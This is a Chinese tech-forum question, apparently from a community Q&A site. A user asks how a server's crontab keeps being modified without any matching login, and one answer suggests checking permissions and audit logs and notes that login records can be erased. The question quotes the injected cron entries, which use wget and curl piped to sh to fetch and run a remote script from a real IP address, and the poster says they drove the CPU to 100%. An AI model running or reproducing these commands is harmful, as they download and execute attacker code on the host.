IT其它crontab

被人修改了某个用户的crontab,没有看到该用户在该时间前后登录过系统?

一台阿里云机器,被人修改了某个用户的crontab/9 * wget -O - -q http://91.230.47.40/common/logo.jpg|sh/10 * curl http://91.230.47.40/common/logo.jpg|sh导致这台CPU100%等问题。查看/var/log/cron发现是该用户修改了cron,记录下修改时间但是用last|more查看用...显示全部

一台阿里云机器,被人修改了某个用户的crontab

/9 * wget -O - -q http://91.230.47.40/common/logo.jpg|sh

/10 * curl http://91.230.47.40/common/logo.jpg|sh

导致这台CPU100%等问题。
查看/var/log/cron发现是该用户修改了cron,记录下修改时间
但是用last|more查看用户登录情况没有看到该用户在该时间前后登录过系统。
后来修改了用户的密码,去除了crontab中的内容,但是过几天发现crontab又被修改了。同时也没有该用户在期间有登录的信息。请问如何做到了,如何避免这种情况再次发生。团队中没有人去修改,有点像病毒一样或者被人攻击了。

收起
参与8

查看其它 2 个回答Acdante的回答

AcdanteAcdante  技术总监 , SHFY

是的,最好查清楚权限问题,登录记录是可以抹除的。
有审计最好,没有可以考虑一下阿里云那边的,或者和阿里云沟通一下。

互联网服务 · 2017-09-05
浏览1806
luodi 邀答

回答者

Acdante
Acdante111745
技术总监SHFY
擅长领域: 存储服务器数据库

Acdante 最近回答过的问题

回答状态

  • 发布时间:2017-09-05
  • 关注会员:4 人
  • 回答浏览:1806
  • X社区推广